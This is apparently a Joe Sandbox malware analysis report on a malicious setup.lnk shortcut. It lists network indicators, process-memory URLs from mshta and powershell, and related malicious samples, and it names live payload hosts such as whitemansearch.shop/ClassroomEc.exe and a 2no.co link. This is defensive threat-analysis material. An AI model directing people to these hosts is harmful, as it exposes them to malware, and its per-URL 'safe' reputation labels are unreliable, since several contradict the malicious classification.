              http://whitemansearch.shop/setupH0%Avira URL Cloudsafe
              http://crl.microsoft80%Avira URL Cloudsafe
              http://crl.microsA0%Avira URL Cloudsafe
              http://whitemansearch.shop/setuptC:0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupt0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupX0%Avira URL Cloudsafe
              http://whitemansearch.shop/setup$global:?0%Avira URL Cloudsafe
              http://whitemansearch.shop/setuphttp://whitemansearch.shop/setup0%Avira URL Cloudsafe
              http://whitemansearch.shop/setup0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupouteHelper.dll0%Avira URL Cloudsafe
              http://whitemansearch.shop/setupl/Z0%Avira URL Cloudsafe
              http://whitemansearch.shop/setup...0%Avira URL Cloudsafe
              http://whitemansearch.shop0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              whitemansearch.shop
              5.101.153.86
              truetrue
                unknown
                2no.co
                104.21.79.229
                truefalse
                  unknown
                  accounts.google.com
                  142.250.31.84
                  truefalse
                    high
                    www.google.com
                    142.250.81.228
                    truefalse
                      high
                      clients.l.google.com
                      142.251.40.238
                      truefalse
                        high
                        clients2.google.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://whitemansearch.shop/ClassroomEc.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          about:blankfalse
                          • Avira URL Cloud: safe
                          low
                          https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000005071B001EDfalse
                            high
                            https://www.google.com/recaptcha/api.jsfalse
                              high
                              https://2no.co/2ZrVm4false
                              • Avira URL Cloud: malware
                              unknown
                              https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                high
                                https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1riffalse
                                  high
                                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                    high
                                    https://www.google.com/recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1bfalse
                                      high
                                      https://www.google.com/favicon.icofalse
                                        high
                                        http://whitemansearch.shop/setuptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                                          high
                                          https://www.google.com/false
                                            high
                                            https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtAfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://whitemansearch.shop/setupv3mshta.exe, 00000004.00000002.2037273373.00000270B5050000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://2no.co/2ZrVm4;Set-ItemPropertypowershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://whitemansearch.shop/setup48mshta.exe, 00000004.00000002.2037273373.00000270B5050000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000005.00000003.2013768380.0000011ECA300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://whitemansearch.shop/setup...JLmshta.exe, 00000004.00000002.2037542726.00000270B511A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033778159.00000270B5119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033340330.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.autoitscript.com/autoit3/ClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.microsApowershell.exe, 00000008.00000002.2240635264.0000023DA2AA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://whitemansearch.shop/ClassroomEc.exeppowershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://whitemansearch.shop/setup.mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://whitemansearch.shop/setup(mshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2261109979.000001E85253E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860B82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://oneget.orgXpowershell.exe, 00000006.00000002.2261109979.000001E85238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://whitemansearch.shop/setupaProgramFilforfiles.exe, 00000000.00000002.1997817259.0000022AC8470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2261109979.000001E850B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150689893.0000023D8A5A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://whitemansearch.shop/setup9mshta.exe, 00000004.00000002.2037315824.00000270B5075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036767666.00000270B5075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2261109979.000001E85253E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2351092206.000001E860B82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.2261109979.000001E85238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://whitemansearch.shop/setupRmshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          unknown
                                                          http://whitemansearch.shop/setupQmshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://whitemansearch.shop/setupKmshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://go.micropowershell.exe, 00000006.00000002.2261109979.000001E851735000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://whitemansearch.shop/setupHmshta.exe, 00000004.00000002.2038065089.00000270B6B50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.2196850239.0000023D9A631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.autoitscript.com/autoit3/XClassroomEc.exe, 0000000C.00000003.2165844334.000000000323C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.microsoft8powershell.exe, 00000006.00000002.2363821774.000001E868C90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://whitemansearch.shop/setupC:forfiles.exe, 00000000.00000002.1997860800.0000022AC8480000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037273373.00000270B5050000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://whitemansearch.shop/setuptC:mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://whitemansearch.shop/setupXmshta.exe, 00000004.00000003.2032015087.00000278B749B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2030517718.00000278B748F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2031354234.00000278B7491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://whitemansearch.shop/setuptmshta.exe, 00000004.00000002.2037905939.00000270B52A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://whitemansearch.shop/setuphttp://whitemansearch.shop/setupmshta.exe, 00000004.00000003.2034272344.00000278B7503000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000005.00000003.2013768380.0000011ECA373000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://whitemansearch.shop/setup$global:?powershell.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://whitemansearch.shop/setupqmshta.exe, 00000004.00000003.2036700238.00000278B74CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2039999977.00000278B74CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033752697.00000278B74CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://whitemansearch.shop/setupouteHelper.dllmshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://whitemansearch.shop/setupl/Zmshta.exe, 00000004.00000003.2033340330.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037468417.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://whitemansearch.shoppowershell.exe, 00000008.00000002.2150689893.0000023D8A85E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://aka.ms/pscore68powershell.exe, 00000006.00000002.2261109979.000001E850B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150689893.0000023D8A5A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://whitemansearch.shop/setup...mshta.exe, 00000004.00000002.2037542726.00000270B511A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033778159.00000270B5119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033340330.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026672661.00000270B5108000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5108000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://crl.vpowershell.exe, 00000008.00000002.2121297266.0000023D88A07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://oneget.orgpowershell.exe, 00000006.00000002.2261109979.000001E85238B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.80.36
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.251.40.238
                                                                          clients.l.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          5.101.153.86
                                                                          whitemansearch.shopRussian Federation
                                                                          198610BEGET-ASRUtrue
                                                                          142.251.32.99
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.81.228
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.21.79.229
                                                                          2no.coUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          142.250.72.110
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.31.84
                                                                          accounts.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          IP
                                                                          192.168.2.16
                                                                          192.168.2.5
                                                                          192.168.2.13
                                                                          192.168.2.23
                                                                          192.168.2.15
                                                                          127.0.0.1
                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1395713
                                                                          Start date and time:2024-02-20 23:45:08 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 10m 59s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:29
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:setup.lnk
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.troj.spyw.evad.winLNK@54/56@11/15
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 94%
                                                                          • Number of executed functions: 63
                                                                          • Number of non-executed functions: 44
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .lnk
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 23.51.58.94, 172.217.165.131, 34.104.35.123, 142.250.65.227, 142.250.65.170, 142.251.41.10, 142.250.80.42, 142.250.81.234, 142.251.35.170, 142.251.40.234, 142.250.65.202, 142.251.40.202, 142.250.65.234, 142.250.176.202, 142.250.80.106, 142.251.32.106, 142.250.80.74, 142.251.40.106, 142.251.40.138, 142.251.40.170, 142.251.40.195, 142.251.40.131, 192.229.211.108, 72.21.81.240
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, www.gstatic.com, prod.fs.microsoft.com.akadns.net
                                                                          • Execution Graph export aborted for target mshta.exe, PID 7216 because there are no executed function
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • VT rate limit hit for: setup.lnk
                                                                          TimeTypeDescription
                                                                          23:45:57API Interceptor2x Sleep call for process: svchost.exe modified
                                                                          23:45:58API Interceptor1x Sleep call for process: mshta.exe modified
                                                                          23:45:59API Interceptor79x Sleep call for process: powershell.exe modified
                                                                          23:46:44API Interceptor1x Sleep call for process: Identification.pif modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.79.229Blog.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                                            file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                              file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                  file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                    file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoader, Socks5SystemzBrowse
                                                                                      rlRiFBcuVa.exeGet hashmaliciousRedLine, SmokeLoader, XmrigBrowse
                                                                                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                          file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                                                                            file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                                                                              239.255.255.250file.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                https://www.evernote.com/shard/s491/sh/5d87b597-8484-2539-a327-e9bf2ae43c20/xh8TbUym9taqTRzKKMtdkTHHnVia-XpHpoMUAOC9Z_NyOKNkzuKbubUs_QGet hashmaliciousHTMLPhisherBrowse
                                                                                                  https://secure.adnxs.com/clktrb?id=360572&redir=//mailava.com/itokaytakeurtime/Questenginc/a2V2aW5tQHF1ZXN0ZW5naW5jLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                    https://m33h876fkad.larksuite.com/wiki/MhqXwPA1ciHmvfk380uuwXn6s8c?from=from_copylinkGet hashmaliciousHTMLPhisherBrowse
                                                                                                      http://sleep.stratosbody.comGet hashmaliciousUnknownBrowse
                                                                                                        https://lockton-my.sharepoint.com:443/:x:/p/aschultz/Edjpe2rsXltPucXveuJmBS4BJnmrwhDgdpsJVNly3eg8iA?e=4%3aaV9pwX&at=9Get hashmaliciousHTMLPhisherBrowse
                                                                                                          Top Circle.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                            https://www.dropbox.com/scl/fi/84tsomcb1i85prnzglz2e/Dordan-Manufacturing-Inc.-ACKNOWLEDGEMENT_053781.pdf?rlkey=u2mc6vbcg3vqo3fr6dz3l2rnj&dl=0Get hashmaliciousUnknownBrowse
                                                                                                              wgnD5cuT6o.exeGet hashmaliciousNanocoreBrowse
                                                                                                                https://auth-securedoc.com/Malyssa.torosantucci@firstontario.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                  5.101.153.86mwcPF1EpU6.exeGet hashmaliciousDCRatBrowse
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    2no.coBlog.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                    • 104.21.79.229
                                                                                                                    qG2cUr0x4A.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                    • 172.67.149.76
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 104.21.79.229
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 172.67.149.76
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 104.21.79.229
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 172.67.149.76
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 104.21.79.229
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 172.67.149.76
                                                                                                                    file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                    • 172.67.149.76
                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                    • 104.21.79.229
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUSfile.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 172.64.207.38
                                                                                                                    https://www.evernote.com/shard/s491/sh/5d87b597-8484-2539-a327-e9bf2ae43c20/xh8TbUym9taqTRzKKMtdkTHHnVia-XpHpoMUAOC9Z_NyOKNkzuKbubUs_QGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    https://secure.adnxs.com/clktrb?id=360572&redir=//mailava.com/itokaytakeurtime/Questenginc/a2V2aW5tQHF1ZXN0ZW5naW5jLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.26.13.205
                                                                                                                    32.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.62.230
                                                                                                                    https://m33h876fkad.larksuite.com/wiki/MhqXwPA1ciHmvfk380uuwXn6s8c?from=from_copylinkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.18.11.207
                                                                                                                    kn328E7C2B.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                                    • 104.21.11.125
                                                                                                                    Top Circle.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                    • 104.21.92.48
                                                                                                                    https://www.dropbox.com/scl/fi/84tsomcb1i85prnzglz2e/Dordan-Manufacturing-Inc.-ACKNOWLEDGEMENT_053781.pdf?rlkey=u2mc6vbcg3vqo3fr6dz3l2rnj&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                    • 104.17.2.184
                                                                                                                    https://auth-securedoc.com/Malyssa.torosantucci@firstontario.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.17.2.184
                                                                                                                    https://iqutrbanen.ru/xDD94l7/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.21.80.141
                                                                                                                    BEGET-ASRUFedEx_AWB#53053752046.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 45.130.41.51
                                                                                                                    https://csxsteam.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.130.41.12
                                                                                                                    oi30i8r35W.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    • 5.101.152.58
                                                                                                                    pXVVl7pMmy.exeGet hashmaliciousDCRatBrowse
                                                                                                                    • 5.101.152.58
                                                                                                                    DHL_AWB#6209811980.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 45.130.41.51
                                                                                                                    DE6roRnbWj.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.147.176.145
                                                                                                                    DE6roRnbWj.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.147.176.145
                                                                                                                    mwcPF1EpU6.exeGet hashmaliciousDCRatBrowse
                                                                                                                    • 5.101.153.86
                                                                                                                    a5ZFXj0x18.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.147.176.145
                                                                                                                    PO-H23-0006384.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 45.130.41.51
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    28a2c9bd18a11de089ef85a160da29e4https://secure.adnxs.com/clktrb?id=360572&redir=//mailava.com/itokaytakeurtime/Questenginc/a2V2aW5tQHF1ZXN0ZW5naW5jLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 40.68.123.157
                                                                                                                    http://sleep.stratosbody.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 40.68.123.157
                                                                                                                    https://lockton-my.sharepoint.com:443/:x:/p/aschultz/Edjpe2rsXltPucXveuJmBS4BJnmrwhDgdpsJVNly3eg8iA?e=4%3aaV9pwX&at=9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 40.68.123.157
                                                                                                                    https://www.dropbox.com/scl/fi/84tsomcb1i85prnzglz2e/Dordan-Manufacturing-Inc.-ACKNOWLEDGEMENT_053781.pdf?rlkey=u2mc6vbcg3vqo3fr6dz3l2rnj&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                    • 40.68.123.157
                                                                                                                    wgnD5cuT6o.exeGet hashmaliciousNanocoreBrowse
                                                                                                                    • 40.68.123.157
                                                                                                                    RemittanceAdvice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 40.68.123.157
